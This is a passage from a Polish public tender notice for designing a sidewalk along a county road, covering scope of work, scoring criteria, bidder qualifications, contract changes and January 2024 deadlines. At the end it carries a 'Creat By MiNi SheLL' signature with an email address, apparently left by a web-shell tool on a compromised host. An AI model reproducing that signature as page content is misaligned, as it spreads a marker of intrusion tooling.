kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych,<br/>-	ustawy z dnia 20 lipca 2017 r. Prawo wodne,<br/>-	ustawy z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska,<br/>-	ustawy z dnia 11 września 2019 r. Prawo zamówień publicznych,<br/>-	rozporządzenia Ministra Infrastruktury z dnia 24 czerwca 2022 r. w sprawie przepisów techniczno-budowlanych dotyczących dróg publicznych <br/>-	rozporządzenia Ministra Infrastruktury z dnia 16 lutego 2005 r. w sprawie sposobu numeracji i ewidencji dróg publicznych, obiektów mostowych, tuneli, przepustów i promów oraz rejestru numerów nadanych drogom, obiektom mostowym i tunelom, <br/>-	rozporządzenia Ministra Transportu i Gospodarki Morskiej z dnia 25 kwietnia 2012 r. w sprawie ustalenia geotechnicznych warunków posadowienia obiektów budowlanych <br/>c)	Dokumentację należy wykonać w pikietażu obowiązującym na drodze powiatowej z podaniem zmian jeśli występują. <br/>d)	W ramach zadania do obowiązków Wykonawcy należy również:<br/>•	opracowanie inwentaryzacji stanu istniejącego,<br/>•	wykonanie opracowania ewidencyjnego<br/>•	opracowanie rozwiązań projektowych mających za zadanie połączyć projektowany chodnik z chodnikami istniejącymi<br/>•	opracowanie koncepcji w zakresie rozwiązań technicznych i technologicznych <br/>•	uzyskanie pisemnego potwierdzenia właściwego organu braku konieczności uzyskania DŚU; opracowanie materiałów do decyzji o środowiskowych uwarunkowaniach (jeżeli zajdzie potrzeba uzyskania decyzji o środowiskowych uwarunkowaniach)<br/>•	wykonanie i opracowanie badań geologiczno-inżynieryjnych, geotechnicznych,<br/>•	opracowanie operatów wodnoprawnych (jeżeli zajdzie potrzeba uzyskania decyzji wodnoprawnej)<br/>•	projektowanie chodnika w pasie drogowym <br/>•	opracowanie kompleksowej dokumentacji projektowej w stadium projektu budowlanego,<br/>•	opracowanie kompleksowej dokumentacji projektowej w stadium projektu wykonawczego, w tym SST, przedmiarów i kosztorysów ofertowych,<br/>•	opracowanie przedmiarów oraz kosztorysów inwestorskich,<br/>•	wykonanie projektów rozbiórki obiektów budowlanych (jeżeli zajdzie taka konieczność),<br/>•	opracowanie map projektów podziału nieruchomości wraz z wykazami zmian danych ewidencyjnych (jeżeli zajdzie taka konieczność),<br/>•	wznowienie na gruncie punktów granicznych pasa drogowego znakami granicznymi według zasad określonych w przepisach dotyczących geodezji i kartografii, oraz przekazanie Zamawiającemu kopii protokołu z w/w czynności potwierdzonych przez Ośrodek Dokumentacji przed przekazaniem map do celów projektowych,<br/>•	wyznaczenie i utrwalenie na gruncie nowych granic pasa drogowego powstałych w wyniku podziałów zgodnie z prawomocną decyzją ZRID.<br/>•	Zamawiający udzieli Wykonawcy pełnomocnictwa w zakresie niezbędnym do uzyskania decyzji o zezwoleniu na realizację inwestycji drogowej lub uzyskanie pozwolenia na budowę zgodnie z Prawem Budowlanym <br/>3)	Zamawiający oczekuje od Wykonawcy podania ceny za realizację zamówienia, jako ceny ryczałtowej, która obejmuje wykonanie wszystkich elementów zamówienia wchodzących w skład dokumentów postępowania, w tym Opisu przedmiotu zamówienia, łącznie z podatkiem VAT obowiązującym w dniu złożenia oferty. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71000000-8 - Usługi architektoniczne, budowlane, inżynieryjne i kontrolne</p> <p class="mb-0">71322000-1 - Usługi inżynierii projektowej w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">71242000-6 - Przygotowanie przedsięwzięcia i projektu, oszacowanie kosztów</p> <p class="mb-0">71248000-8 - Nadzór nad projektem i dokumentacją</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty w każdej części zamówienia, zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1. Cena 60 punktów<br/>2.	Dodatkowy okres rękojmi za wady 20 punktów<br/>3.	Dodatkowe doświadczenie projektanta w specjalności drogowej 20 punktów<br/>	Razem	100 punktów<br/><br/>2.	Sposób dokonywania oceny:<br/>a)	Sposób oceny ofert w kryterium „Cena” (Pc):<br/>Pc = (Cbn /Cb) x 60 punktów<br/><br/>Gdzie: Pc - liczba punktów<br/>Cbn - najniższa ze wszystkich ofert cena ofertowa brutto;<br/>Cb - proponowana w danej ofercie cena ofertowa brutto.<br/><br/>b)	Sposób oceny ofert w kryterium „Dodatkowy okres rękojmi za wady” (Pr).<br/>Ocena ofert w tym kryterium dokonana zostanie na podstawie podanego przez wykonawcę w Formularzu ofertowym okresu rękojmi w pełnych latach, w oparciu o następujące zasady: <br/>Wykonawca, który zadeklaruje w swojej ofercie okres rękojmi:<br/>	3 lata – otrzyma 0 punktów,<br/>	4 lata – otrzyma 10 punktów,<br/>	5 lat – otrzyma 20 punktów.<br/>Jako minimalny okres rękojmi Zamawiający uważał będzie okres 3 lat, natomiast jako maksymalny 5 lat. Niepodanie przez wykonawcę w formularzu oferty okresu rękojmi za wady, skutkować będzie uznaniem, że wykonawca deklaruje okres rękojmi 3 lata. Bieg okresu rękojmi liczony będzie od dnia podpisania protokołu odbioru – według zasad określonych w projektowanych postanowieniach umowy. <br/><br/>c)	Sposób oceny ofert w kryterium „Dodatkowe doświadczenie zawodowe projektanta w specjalności drogowej” (Pd).<br/>Ocena ofert w tym kryterium dokonana zostanie na podstawie podanego przez Wykonawcę w Formularzu ofertowym dodatkowego doświadczenia zawodowego osoby mającej pełnić funkcję projektanta w specjalności inżynieryjnej drogowej, ponad doświadczenie wymagane dla tej osoby w ramach warunku udziału w postępowaniu określonego w Rozdziale II pkt. 7 SWZ. <br/>W związku z powyższy, Wykonawca, który przedstawi w swojej ofercie dodatkowe doświadczenie (tj. ponad wymagane przez Zamawiającego w Rozdziale II pkt. 7 SWZ), ww. projektanta w projektowaniu polegającym na wykonaniu:<br/>	1 dokumentacji projektowej dotyczącej budowy, przebudowy lub rozbudowy drogi lub ciągu pieszo-rowerowego lub ścieżki rowerowej lub chodnika – otrzyma 0 punktów,<br/>	2 dokumentacji projektowych dotyczących budowy, przebudowy lub rozbudowy drogi lub ciągu pieszo-rowerowego lub ścieżki rowerowej lub chodnika – otrzyma 10 punktów, <br/>	3 i więcej dokumentacji projektowych dotyczących budowy, przebudowy lub rozbudowy drogi lub ciągu pieszo-rowerowego lub ścieżki rowerowej lub chodnika – otrzyma 20 punktów<br/> <br/>d)	Całkowita „Liczba punktów”, zostanie obliczona w następujący sposób:<br/>Lp = Pc + Pr + Pd, gdzie:<br/><br/>Lp - całkowita liczba punktów uzyskanych przez ofertę<br/>Pc - liczba punktów uzyskanych w kryterium Cena <br/>Pg - liczba punktów uzyskanych w kryterium Dodatkowy okres rękojmi za wady<br/>Pd - liczba punktów uzyskanych w kryterium Dodatkowe doświadczenie zawodowe projektanta w specjalności drogowej<br/><br/>3.	Obliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>4.	Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona <br/>z dokładnością do dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowe doświadczenie projektanta w specjalności drogowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dodatkowy okres rękojmi za wady</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zamawiający ma podstawie art. 112 ustawy Pzp, określa (jednakowo dla wszystkich części zamówienia) warunek udziału w postępowaniu dotyczący:<br/><br/>1)	zdolności technicznej lub zawodowej:<br/>a)	Zamawiający uzna, że wykonawca spełnia warunek ww. zakresie jeżeli wykaże, że: <br/>•	dysponuje lub będzie dysponował przynajmniej 1 osobą posiadającą uprawnienia budowlane bez ograniczeń do projektowania w specjalności inżynieryjnej drogowej oraz posiadającą doświadczenie zawodowe w projektowaniu w powyższej specjalności, polegające na opracowaniu co najmniej 1 dokumentacji projektowej budowy, przebudowy lub rozbudowy drogi lub ciągu pieszo-rowerowego lub ścieżki rowerowej. Osoba ta będzie pełniła funkcję projektanta w branży drogowej. <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą wspólnie spełniać ww. warunek.<br/>Ww. osoba powinna posiadać prawo do wykonywania samodzielnych funkcji technicznych w budownictwie oraz wymagane uprawnienia do projektowania określone w ustawie z dnia 7 lipca 1994 r. Prawo budowlane lub odpowiadające im ważne uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawnych oraz musi być wpisana na listę członków właściwego samorządu zawodowego, zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa lub musi spełniać warunki, o których mowa w art. 12a Prawa budowlanego, czyli być osobą której odpowiednie kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych lub spełniać wymogi, o których mowa w art. 20a ustawy o samorządach zawodowych architektów oraz inżynierów budownictwa dotyczące świadczenia usług transgranicznych.<br/>W celu wykazania spełniania warunku udziału w postępowaniu Wykonawca przekaże Zamawiającemu wraz z ofertą oświadczenie na podstawie art. 125 ust. 1 Pzp (sporządzone według załącznika nr 2 do SWZ) oraz na wezwanie Zamawiającego Formularz „Wykaz osób skierowanych przez Wykonawcę do realizacji zamówienia”, który stanowi Załącznik nr 9 do niniejszego SWZ.<br/><br/>Zamawiający dopuszcza, w przypadku składania przez Wykonawcę oferty na kilka części, aby w celu wykazania spełniania ww. warunku udziału w postępowaniu dysponował tą samą osobą w każdej części. <br/><br/>W przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców warunek zostanie uznany za spełniony, jeżeli co najmniej 1 z wykonawców lub wszyscy łącznie wykażą, że spełniają w/w opisany warunek. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty w danej części zamówienia wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych<br/>	oświadczenie Wykonawcy o aktualności informacji zawartych <br/>w oświadczeniu, o którym mowa w art.125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania- wg Załącznika Nr 8 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zgodnie z art. 274 ust. 1 ustawy Pzp, zamawiający przed wyborem najkorzystniejszej oferty w danej części zamówienia wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych<br/>a)	W zakresie potwierdzenia spełniania warunków udziału w postępowaniu:<br/>	Wykaz osób (Załącznik nr 9) skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, zgodnie w wymogiem określonym w Rozdziale II ust. 7 pkt. 1 SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy występujący wspólnie są<br/>zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania ich<br/>wpostępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie<br/>prowadzona przez zamawiającego wyłącznie z pełnomocnikiem. Oświadczenie potwierdzające brak podstaw do<br/>wykluczenia wykonawcy oraz spełnienie warunków udziału w postępowaniu składa każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie. Odnośnie do wykonawców wspólnie ubiegających się o udzielenie zamówienia mogą oni<br/>polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są<br/>wymagane.<br/>W takim przypadku Wykonawcy składają oświadczenie, określone w art. 117 ust. 4 ustawy Pzp, którego wzór określony<br/>został w Załączniku nr 7 do SWZ. Pozostałe wymagania określają dokumenty zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zakazuje się istotnych zmian postanowień umowy dla wprowadzenia których zgodnie z art. 454 Ppz wymagane jest<br/>przeprowadzenie nowego postępowania o udzielenie zamówienia.<br/>2. Dopuszczalne są następujące przypadki zmiany i warunki zmiany treści umowy na skutek okoliczności, których nie<br/>można było przewidzieć w chwili zawarcia umowy (szczegółowe okoliczności opisano w PPU).<br/>3. Dopuszcza się również możliwość zmian postanowień umowy, w przypadku, gdy konieczność wprowadzenia zmian<br/>spowodowana jest zmianą powszechnie obowiązujących przepisów prawa, w tym w szczególności<br/>w zakresie zmian wysokości wynagrodzenia należnego Wykonawcy<br/>(szczegółowo opisano w PPU). 4. Dopuszcza się również możliwość wprowadzenia zmian umowy, dotyczących<br/>wynagrodzenia Wykonawcy, poprzez jego waloryzację (szczegółowo opisano w PPU). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-01-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-01-08 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-02-06</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com